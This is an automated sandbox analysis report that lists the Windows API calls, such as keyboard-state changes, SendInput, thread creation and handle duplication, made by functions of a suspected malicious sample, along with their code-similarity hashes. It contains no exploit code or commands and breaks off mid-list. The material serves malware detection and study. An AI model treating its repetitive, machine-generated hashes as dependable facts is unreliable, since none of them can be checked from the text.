                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: Msctls_Progress32
                                                                        • API String ID: 3850602802-3636473452
                                                                        • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                        • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                        • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                        • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                        • String ID:
                                                                        • API String ID: 3985565216-0
                                                                        • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                        • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                        • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                        • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 0041F707
                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                        • _free.LIBCMT ref: 0041F71A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap_free_malloc
                                                                        • String ID: [B
                                                                        • API String ID: 1020059152-632041663
                                                                        • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                        • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                        • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                        • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                        APIs
                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                        • __calloc_crt.LIBCMT ref: 00413DB0
                                                                        • __getptd.LIBCMT ref: 00413DBD
                                                                        • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                        • _free.LIBCMT ref: 00413E07
                                                                        • __dosmaperr.LIBCMT ref: 00413E12
                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                        • String ID:
                                                                        • API String ID: 155776804-0
                                                                        • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                        • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                        • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                        • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                        APIs
                                                                          • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                          • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                        • String ID:
                                                                        • API String ID: 1957940570-0
                                                                        • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                        • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                        • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                        • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                        APIs
                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                        • ExitThread.KERNEL32 ref: 00413D4E
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                        • __freefls@4.LIBCMT ref: 00413D74
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                        • String ID:
                                                                        • API String ID: 259663610-0
                                                                        • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                        • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                        • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                        • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                        APIs
                                                                        • GetClientRect.USER32(?,?), ref: 004302E6
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                        • GetClientRect.USER32(?,?), ref: 00430364
                                                                        • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                        • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                        • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                        • String ID:
                                                                        • API String ID: 3220332590-0
                                                                        • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                        • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                        • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                        • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1612042205-0
                                                                        • Opcode ID: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                                        • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                        • Opcode Fuzzy Hash: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                                        • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove_strncmp
                                                                        • String ID: >$U$\
                                                                        • API String ID: 2666721431-237099441
                                                                        • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                        • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                        • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                        • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 0044C570
                                                                        • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                        • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                        • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                        • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$InputSend
                                                                        • String ID:
                                                                        • API String ID: 2221674350-0
                                                                        • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                        • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                        • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                        • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$_wcscat
                                                                        • String ID:
                                                                        • API String ID: 2037614760-0
                                                                        • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                        • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                        • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                        • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                        • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                        • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                        • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Copy$AllocClearErrorLastString
                                                                        • String ID:
                                                                        • API String ID: 960795272-0
                                                                        • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                        • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                        • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                        • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                        APIs
                                                                        • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                        • EndPaint.USER32(?,?), ref: 00447D13
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                        • String ID:
                                                                        • API String ID: 4189319755-0
                                                                        • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                        • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                        • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                        • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                        • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                        • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$LongWindow$InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 1976402638-0
                                                                        • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                        • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                        • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                        • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                        APIs
                                                                        • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                        • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                        • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                        • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                        • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
